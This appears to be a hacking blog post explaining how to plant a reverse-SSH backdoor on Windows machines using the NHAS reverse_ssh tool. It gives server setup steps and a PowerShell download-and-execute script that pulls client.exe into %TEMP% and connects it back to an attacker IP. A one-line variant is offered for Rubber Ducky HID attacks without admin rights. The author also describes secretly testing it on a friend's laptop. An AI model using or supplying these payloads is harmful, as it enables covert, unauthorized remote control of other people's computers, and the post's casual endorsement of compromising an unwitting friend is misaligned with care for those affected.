Hack Windows Machines without any Restriction
Hey Guys Smukx here , hope you guys are doing well . So today i am going to share a technique that can be used to bypass windows securities and create a backdoor using Reverse ssh . Yes using SSH ( Secure Shell ) .
Disclaimer : This Blog is intended to bring awareness and Education Purpose only . Am not Responsible if you got hacking .
So Boot up any Linux machine and download two Files that was created by NHAS . I Recommend using Linux for Attacks .
Create a new rsa key for ssh server and name it as authorized_keys
To Create rsa key using ssh `ssh-keygen -t rsa` to generate keys
Note : Only Name the key as authorized_keys
Download Files From Releases : Click Here
rename the file as authorized_keys
start the server 0.0.0.0:1234 --insecure
So for connecting with the server . do normal ssh like you do .
After connecting . help command will do us a great work providing what features out there !
So For Client ( Victim ) in this case . Download the client.exe file from the Release and open powershell and execute “./client.exe -d <your Server ip>:<port>” .
For Example `./client.exe -d 10.10.10.10:1234` to connect to your server .
If you want to pentest together with your Team mates . just ask you mate to create an rsa key and add the key to the authorized_keys file .
So for automation i have created powershell script that you can use it to download client and execute the program .
$DownloadUrl = "https://github.com/NHAS/reverse_ssh/releases/download/v2.1.3/client.exe"
$DownloadPath = "$env:TEMP\client.exe"
# Replace Ip with your server IP with Port
$Command = "client.exe -d 10.10.10.10:1234"
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile($DownloadUrl, $DownloadPath)
Start-Process -FilePath $DownloadPath -ArgumentList $CommandThis Above Script will download client.exe to the %Temp path and Execute the command and exit . Remember ExecutionPolicy Method must be Unrestricted For That Run the Ps at admin and Type Set ExecutionPolicy Unrestricted ENTER and DONE .
Tested on one of my Friends Laptop win 11 . He didn’t know what i do ! so no worries ;)
And I tested it on Windows 10 machine . When i executed the command version of the scripts in one of my VM’s , i got an connection
You can connect to the Victim Machine via the IP address or with ID of the connected . It Also Supports Tab (Auto completion) .
One Advantages of using Reverse ssh over other payloads it the stability of the connection . it acts like the real console ssh ‘ Not console -> Real SSH’ , so no lag , no latency , portability and no disconnection . you can even disconnect and connect again !
For HID attacks such as Rubber Ducky and Arduino payloads and to avoid ExecutionPolicy methods and Require Admin Methods, use the modified version of the script that i converted into command line.
$DownloadUrl = "https://github.com/NHAS/reverse_ssh/releases/download/v2.1.3/client.exe";$DownloadPath = "$env:TEMP\client.exe";$Command = "client.exe -d 192.168.1.103:1234";$WebClient = New-Object System.Net.WebClient;$WebClient.DownloadFile($DownloadUrl, $DownloadPath);Start-Process -FilePath $DownloadPath -ArgumentList $CommandNo Admin is Required to Execute the script command .
For More Ps Scripts visit my Repositary where i explained about tools and techniques about powershell , How to use advance commands , Payloads , Advance commands on powershell for IT background etc…
Check : Ps-script-for-Hackers-and-Pentesters For More Information
Thats it Guys , Thanks for Reading , If you Found this information useful leave a clap
Follow me At Github and Medium
Powershell Repositary : Link
My Stories : Click Here
Bye Bye …
Happy Hacking :)
